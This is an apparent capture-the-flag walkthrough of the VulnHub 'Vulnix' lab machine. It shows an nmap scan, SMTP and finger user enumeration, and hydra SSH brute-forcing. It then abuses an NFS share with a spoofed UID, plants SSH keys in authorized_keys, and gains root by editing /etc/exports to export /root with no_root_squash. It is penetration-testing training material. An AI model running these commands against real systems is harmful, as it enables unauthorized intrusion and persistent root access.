Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2019–10–16T11:55:10+00:00; -3s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL RESP-CODES TOP UIDL STLS PIPELINING CAPA
|_ssl-date: 2019–10–16T11:55:10+00:00; -3s from scanner time.
111/tcp open rpcbind 2–4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 36626/tcp6 mountd
| 100005 1,2,3 43733/udp6 mountd
| 100005 1,2,3 46737/tcp mountd
| 100005 1,2,3 60829/udp mountd
| 100021 1,3,4 39481/udp nlockmgr
| 100021 1,3,4 39797/tcp6 nlockmgr
| 100021 1,3,4 40801/tcp nlockmgr
| 100021 1,3,4 46294/udp6 nlockmgr
| 100024 1 34603/udp status
| 100024 1 36114/tcp status
| 100024 1 49520/udp6 status
| 100024 1 51984/tcp6 status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: listed STARTTLS ENABLE capabilities LOGIN-REFERRALS have more IMAP4rev1 SASL-IR post-login Pre-login LOGINDISABLEDA0001 OK IDLE ID LITERAL+
|_ssl-date: 2019–10–16T11:55:11+00:00; -2s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open shell Netkit rshd
993/tcp open ssl/imaps?
|_ssl-date: 2019–10–16T11:55:10+00:00; -3s from scanner time.
995/tcp open ssl/pop3s?
|_ssl-date: 2019–10–16T11:55:10+00:00; -3s from scanner time.
2049/tcp open nfs_acl 2–3 (RPC #100227)
36114/tcp open status 1 (RPC #100024)
40801/tcp open nlockmgr 1–4 (RPC #100021)
43232/tcp open mountd 1–3 (RPC #100005)
44143/tcp open mountd 1–3 (RPC #100005)
46737/tcp open mountd 1–3 (RPC #100005)
MAC Address: 08:00:27:E9:FD:8C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32–3.10
Uptime guess: 198.842 days (since Sun Mar 31 21:14:34 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -3sTRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 10.0.0.20NSE: Script Post-scanning.
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.30 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
Here we are having nfs-asl port to be open which is running on port 2049 soo let’s find out which directory are shared
showmount -e 10.0.0.20Now let’s mount the directory to our localhost using
mount -t nfs 10.0.0.20:/home/vulnix /tmp/vulnixAnd we got /home/vulnix to be shared directory mounted successfully but we are not having access to the directory as we are not having the valid UID and GID to get in the the vulnix directory so let’s now so let’s find out another way to move in….
As we found smtp port open at 25 let’s start smtp user enumeration
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 10.0.0.20And we found 2 users to be there on the output
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
| Scan Information |
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — Mode ………………… VRFY
Worker Processes ……… 5
Usernames file ……….. /usr/share/seclists/Usernames/top-usernames-shortlist.txt
Target count …………. 1
Username count ……….. 17
Target TCP port ………. 25
Query timeout ………… 5 secs
Target domain …………######## Scan started at Wed Oct 16 22:06:40 2019 #########
10.0.0.20: root exists
10.0.0.20: user exists
######## Scan completed at Wed Oct 16 22:06:40 2019 #########
2 results.17 queries in 1 seconds (17.0 queries / sec)
Another user enumeration with finger service running on port 79, and found a perl script at GITHUB and used below command to enumerate
perl finger-user-enum.pl -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.0.0.20Finger service is used to look up users on a remote machine , so let’s see what did we get
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
— — — — — — — — — — — — — — — — — — — — — — — — — — — — —
| Scan Information |
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — Worker Processes ……… 5
Usernames file ……….. /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count …………. 1
Username count ……….. 113
Target TCP port ………. 79
Query timeout ………… 5 secs
Relay Server …………. Not used######## Scan started at Wed Oct 16 22:11:21 2019 #########
@10.0.0.20: No one logged on…
bin@10.0.0.20: Login: bin Name: bin..Directory: /bin Shell: /bin/sh..Never logged in…No mail…No Plan…
daemon@10.0.0.20: Login: daemon Name: daemon..Directory: /usr/sbin Shell: /bin/sh..Never logged in…No mail…No Plan…
backup@10.0.0.20: Login: backup Name: backup..Directory: /var/backups Shell: /bin/sh..Never logged in…No mail…No Plan…
games@10.0.0.20: Login: games Name: games..Directory: /usr/games Shell: /bin/sh..Never logged in…No mail…No Plan…
gnats@10.0.0.20: Login: gnats Name: Gnats Bug-Reporting System (admin)..Directory: /var/lib/gnats Shell: /bin/sh..Never logged in…No mail…No Plan…
irc@10.0.0.20: Login: irc Name: ircd..Directory: /var/run/ircd Shell: /bin/sh..Never logged in…No mail…No Plan…
list@10.0.0.20: Login: list Name: Mailing List Manager..Directory: /var/list Shell: /bin/sh..Never logged in…No mail…No Plan…
lp@10.0.0.20: Login: lp Name: lp..Directory: /var/spool/lpd Shell: /bin/sh..Never logged in…No mail…No Plan…
libuuid@10.0.0.20: Login: libuuid Name: ..Directory: /var/lib/libuuid Shell: /bin/sh..Never logged in…No mail…No Plan…
mail@10.0.0.20: Login: mail Name: mail..Directory: /var/mail Shell: /bin/sh..Never logged in…No mail…No Plan…..Login: dovecot Name: Dovecot mail server..Directory: /usr/lib/dovecot Shell: /bin/false..Never logged in…No mail…No Plan…
messagebus@10.0.0.20: Login: messagebus Name: ..Directory: /var/run/dbus Shell: /bin/false..Never logged in…No mail…No Plan…
news@10.0.0.20: Login: news Name: news..Directory: /var/spool/news Shell: /bin/sh..Never logged in…No mail…No Plan…
nobody@10.0.0.20: Login: nobody Name: nobody..Directory: /nonexistent Shell: /bin/sh..Never logged in…New mail received Wed Oct 16 12:47 2019 (BST).. Unread since Thu Oct 3 14:02 2019 (BST)..No Plan…
man@10.0.0.20: Login: man Name: man..Directory: /var/cache/man Shell: /bin/sh..Never logged in…No mail…No Plan…
proxy@10.0.0.20: Login: proxy Name: proxy..Directory: /bin Shell: /bin/sh..Never logged in…No mail…No Plan…
root@10.0.0.20: Login: root Name: root..Directory: /root Shell: /bin/bash..Never logged in…No mail…No Plan…
sshd@10.0.0.20: Login: sshd Name: ..Directory: /var/run/sshd Shell: /usr/sbin/nologin..Never logged in…No mail…No Plan…
sync@10.0.0.20: Login: sync Name: sync..Directory: /bin Shell: /bin/sync..Never logged in…No mail…No Plan…
sys@10.0.0.20: Login: sys Name: sys..Directory: /dev Shell: /bin/sh..Never logged in…No mail…No Plan…
syslog@10.0.0.20: Login: syslog Name: ..Directory: /home/syslog Shell: /bin/false..Never logged in…No mail…No Plan…
uucp@10.0.0.20: Login: uucp Name: uucp..Directory: /var/spool/uucp Shell: /bin/sh..Never logged in…No mail…No Plan…
user@10.0.0.20: Login: user Name: user..Directory: /home/user Shell: /bin/bash..Last login Wed Oct 16 12:21 (BST) on pts/0 from 10.0.0.1..No mail…No Plan…..Login: dovenull Name: Dovecot login user..Directory: /nonexistent Shell: /bin/false..Never logged in…No mail…No Plan…
www-data@10.0.0.20: Login: www-data Name: www-data..Directory: /var/www Shell: /bin/sh..Never logged in…No mail…No Plan…
######## Scan completed at Wed Oct 16 22:11:21 2019 #########
24 results.113 queries in 1 seconds (113.0 queries / sec)
Here we found to users to be useful as we are confirmed with 2 users existence so let’s now search for the password with the help of hydra and start brute-forcing on ssh service
hydra -l user -P /usr/share/wordlists/rockyou.txt 10.0.0.20 sshAnd here we get the password for user , letmein
So we used user credentials and logged in to ssh , hence we got the ssh connection
ssh user@10.0.0.20and using password letmein we got the ssh access
And here when we read the passwd file we found the UID and GID of vulnix user to be 2008:2008 , so we can now visit the nfs-shared directory of vulnix user , now let’s move to our local system and add a new user using
adduser vulnix and then vim /etc/passwd nad change the vulnix uid and gid to 2008 as i had changed it manually using vim /etc/passwdand edited the vulnix uid and gidvulnix:x:2008:2008:,,,:/home/vulnix:/bin/bash
Now we can move in the mounted vulnix home directory
└──╼ #su vulnix
vulnix@PREDATOR:/root/predator/oscp/vulnhub/vulnix$ cd /tmp/
vulnix@PREDATOR:/tmp$ cd vulnix/
vulnix@PREDATOR:/tmp/vulnix$ ls -la
total 60
drwxr-x — — 5 vulnix vulnix 4096 Oct 16 17:11 .
drwxrwxrwt 20 root root 20480 Oct 16 21:58 ..
-rw — — — — 1 vulnix vulnix 905 Oct 3 18:58 .bash_history
-rw-r — r — 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r — r — 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
drwx — — — 2 vulnix vulnix 4096 Oct 3 18:30 .cache
-rw-r — r — 1 vulnix vulnix 675 Apr 3 2012 .profile
drwxr-xr-x 2 vulnix vulnix 4096 Oct 3 18:30 .ssh
drwxr-xr-x 2 vulnix vulnix 4096 Oct 3 18:26 ssh
-rw-rw-r — 1 vulnix vulnix 8 Oct 16 17:11 sudoedit
vulnix@PREDATOR:/tmp/vulnix$Here we see a .ssh folder now let’s move in the .ssh folder and create our own ssh key and replace it with the vulnix .ssh/authorized_keys
creating new ssh key at our localhost
#NOTE :- leave password option empty to easy use└──╼ #ssh-keygen -f anythin
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in anythin.
Your public key has been saved in anythin.pub.
The key fingerprint is:
SHA256:GdD4S+KLFywZ13ePgO5zHtXXZQ9/16LYqpOk7Jmo8d8 root@PREDATOR
The key’s randomart image is:
+ — -[RSA 3072] — — +
| .o |
| … |
| o.. . o|
| . o =oo .. +=|
| * +So o.oo O|
| o + + +…oo|
| . + * .o o |
| o..=+= .o |
| ..o+= E*o |
+ — — [SHA256] — — -+
Here we had created a new ssh key and it has given us two keys anythin and anythin.pub
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix/ssh]
└──╼ #ls -la
total 16
drwxr-xr-x 2 root root 4096 Oct 16 22:38 .
drwxr-xr-x 4 root root 4096 Oct 16 22:37 ..
-rw — — — — 1 root root 2602 Oct 16 22:38 anythin
-rw-r — r — 1 root root 567 Oct 16 22:38 anythin.pubSo now let’s replace the anythin.pub content with /tmp/vulnix/.ssh/authorized_keys we copied the anythin.pub content and used echo command and then pasted the anything.pub content and redirected it to authorized_keys
vulnix@PREDATOR:/tmp/vulnix/.ssh$ echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXPFyuVB5alkcSh5RgReNwZsrHNbxMeM9QabAudiRZqmKOLd2CzT+d8g0rettno50KxsMemdX30nYT7ucYTErNnU7Slhaj2eg2XeDR6E7Zr5c+MsBXeZntPwZMaMj3t6Cz8v2DK2HuQ5sY0xsrVfqBlkbsiymh5tDHrnsI0jV3Oz+ml94/RW3VMTJpfO73UeQRdgePXjeCEgxtfHwnWVdgzbZty22nwXuFavyRppayVtaSXYmXpGGJ9rYYnjd2xituYkYDwQdD4K9w1HVt6vgvFZ5wPQdYMii503No5fYB8npfEr/T8iSXFMdauv2ODy7Rr6DR7DJmK212mtI9vUJBt9gszgP9hb9BkIRPJyklxL0Btr4Roi94d8otiUeuNY1V6OYM9oGQhT23927xXzwvlR4bCCzoQ67lGQxDzamtxzTlRrhhgnpP3EOvtmKAUlNApOkyuasDxW4dQ9t1IJve/Pk/lPUCdGL/G4GmH3rBaTBm7xVSUAsZ8YTkkSBUUw0= “ > authorized_keysHere while generating ssh-keygen we had left the password field empty so let’s connect the vulnix user using ssh
As we had created two keys anythin and anythin.pub we will use anythin to connect ssh with vulnix user as show below
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #ssh -i anythin vulnix@10.0.0.20
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0–29-generic-pae i686)* Documentation: https://help.ubuntu.com/System information as of Wed Oct 16 13:51:20 BST 2019System load: 0.01 Processes: 103
Usage of /: 92.0% of 773MB Users logged in: 1
Memory usage: 11% IP address for eth0: 10.0.0.20
Swap usage: 0%=> / is using 92.0% of 773MBGraph this data and manage this system at https://landscape.canonical.com/Last login: Wed Oct 16 12:38:57 2019 from 10.0.0.1
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
vulnix@vulnix:~$
Here on using sudo -l we get to see that vulnix user is having sudo rights to use sudoedit command on /etc/exports
vulnix@vulnix:~$ sudo -l
Matching ‘Defaults’ entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$
And we are going to escalate user privilege
/etc/exports file usage {the entry in the /etc/exports file would share the directory with the NFS} so we are going to share root directory as shown below
chmod: changing permissions of `/bin/bash’: Operation not permitted
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)
NOTE :- and press ctrl+o to save the file
Here we added the root directory to nfs share , now the root directory will be available to us within 2–3 minutes of interval , or you can restart the machine from virtual box to get an instant action
So let’s see had we got the root directory available for us
└──╼ #showmount -e 10.0.0.20
Export list for 10.0.0.20:
/root *
/home/vulnix *Boom we got /root directory available to us , now let’s mount the root directory
mount -t nfs 10.0.0.20:/root /tmp/rootNow let’s visit /tmp/root and see had we got the root directory or not
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #cd /tmp/root/
┌─[root@PREDATOR]─[/tmp/root]
└──╼ #ls -la
total 48
drwx — — — 3 root root 4096 Sep 3 2012 .
drwxrwxrwt 20 root root 20480 Oct 16 21:58 ..
-rw — — — — 1 root root 0 Sep 3 2012 .bash_history
-rw-r — r — 1 root root 3106 Apr 19 2012 .bashrc
drwx — — — 2 root root 4096 Sep 2 2012 .cache
-rw-r — r — 1 root root 140 Apr 19 2012 .profile
-r — — — — 1 root root 33 Sep 2 2012 trophy.txt
-rw — — — — 1 root root 710 Sep 2 2012 .viminfo
┌─[root@PREDATOR]─[/tmp/root]
└──╼ #Here we will create a new .ssh directory and will add our anythin.pub here with authorized_keys
mkdir .sshcd .sshecho “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXPFyuVB5alkcSh5RgReNwZsrHNbxMeM9QabAudiRZqmKOLd2CzT+d8g0rettno50KxsMemdX30nYT7ucYTErNnU7Slhaj2eg2XeDR6E7Zr5c+MsBXeZntPwZMaMj3t6Cz8v2DK2HuQ5sY0xsrVfqBlkbsiymh5tDHrnsI0jV3Oz+ml94/RW3VMTJpfO73UeQRdgePXjeCEgxtfHwnWVdgzbZty22nwXuFavyRppayVtaSXYmXpGGJ9rYYnjd2xituYkYDwQdD4K9w1HVt6vgvFZ5wPQdYMii503No5fYB8npfEr/T8iSXFMdauv2ODy7Rr6DR7DJmK212mtI9vUJBt9gszgP9hb9BkIRPJyklxL0Btr4Roi94d8otiUeuNY1V6OYM9oGQhT23927xXzwvlR4bCCzoQ67lGQxDzamtxzTlRrhhgnpP3EOvtmKAUlNApOkyuasDxW4dQ9t1IJve/Pk/lPUCdGL/G4GmH3rBaTBm7xVSUAsZ8YTkkSBUUw0=” > authorized_keys
And we had successfully planted our ssh key now let’s connect it with our anythin file
┌─[root@PREDATOR]─[~/predator/oscp/vulnhub/vulnix]
└──╼ #ssh -i anything root@10.0.0.20
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0–29-generic-pae i686)* Documentation: https://help.ubuntu.com/System information as of Wed Oct 16 14:09:08 BST 2019System load: 0.03 Processes: 97
Usage of /: 92.1% of 773MB Users logged in: 1
Memory usage: 11% IP address for eth0: 10.0.0.20
Swap usage: 0%=> / is using 92.1% of 773MBGraph this data and manage this system at https://landscape.canonical.com/Last login: Wed Oct 16 14:05:36 2019 from 10.0.0.1
root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnix:~# ls
trophy.txt
root@vulnix:~#
KABOOOOM 💣
We rooted the machine
………………………………….COWABUNGA…………………………………..
